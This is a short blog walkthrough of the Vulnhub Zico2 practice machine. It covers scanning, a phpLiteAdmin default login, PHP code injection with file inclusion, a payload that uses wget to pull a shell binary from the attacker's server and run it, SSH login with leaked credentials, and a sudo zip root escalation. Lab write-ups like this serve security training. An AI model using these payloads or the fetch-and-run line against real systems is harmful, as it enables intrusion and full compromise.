Vulnhub Zico2 Walkthrough

We start scanning the host with nmap -A -T4 -p- 192.168.1.5 -vv

Dirb came with these directories

We are interested in http://192.168.1.5/dbadmin as you can login using the default password admin

Searching search sploit for phpLiteAdmin

Now the Remote PHP Code Injection is about creating a new database with the name hack ( from the left ) and click create, choose the database we created and from the middle panel choose a name with hack ahs numbers of fields 1, click go

now name the field hack and choose typt TEXT and in the value put  <?php system(“uname -a”); ?>

Now go to http://192.168.1.5/view.php?page=../../usr/databases/hack to get a result from the code we’ve put

We can modify the script and use Metasploit so get a shell

Open a listening port and open a connections to your machine using:

Python –m SimpleHTTPServer 80

Now modify the scipt to be ‘<?php system (“cd /tmp;  wget http://192.168.1.11/shell; chmod +x shell; ./shell”); ?>’

Changing directories to /home/zico/wordpress an viewing config.php found a username and password and used them to login to ssh, user zico pass sWfCsfJSPV9H3AmQzw8

Running this command give us a root shell, first go to tmp folder and create any file with touch command then:

Sudo zip newfile.zip newfile –T –unzip-command=”sh –c /bin/bash”

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s